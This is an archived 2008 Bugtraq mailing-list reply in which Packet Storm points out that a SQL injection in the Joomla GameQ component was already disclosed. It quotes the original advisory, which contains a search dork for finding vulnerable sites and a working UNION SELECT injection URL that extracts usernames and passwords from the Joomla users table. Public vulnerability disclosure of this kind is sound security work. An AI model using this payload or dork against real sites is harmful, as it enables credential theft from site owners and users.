| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 4 Dec 2008 17:08:05 -0500 From: packet@...ketstormsecurity.org To: r3d.w0rm@...oo.com Cc: bugtraq@...urityfocus.com Subject: Re: Joomla Component GameQ Already discovered: http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and below suffer from a SQL injection vulnerability. Authored By <a href="mailto:His0k4.hlm[at]gmail.com">His0k4</a> On Thu, Dec 04, 2008 at 08:20:16AM -0700, r3d.w0rm@...oo.com wrote: > ##################################################################################### > #### Joomla Component GameQ #### > ##################################################################################### > # # > #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # > #Discovered by : Sina Yazdanmehr (R3d.W0rm) # > #Our Site : Http://IRCRASH.COM # > #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # > ##################################################################################### > # # > #Download : http://joomlacode.org/gf/project/gameq # > # # > #DORK : inurl:option=com_gameq # > # # > ##################################################################################### > # [Bug] # > # # > #http://Site/[path]/index.php?option=com_gameq&task=page&category_id=-9999+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/* > # # > ##################################################################################### > # Site : Http://IRCRASH.COM # > ###################################### TNX GOD ######################################
Powered by blists - more mailing lists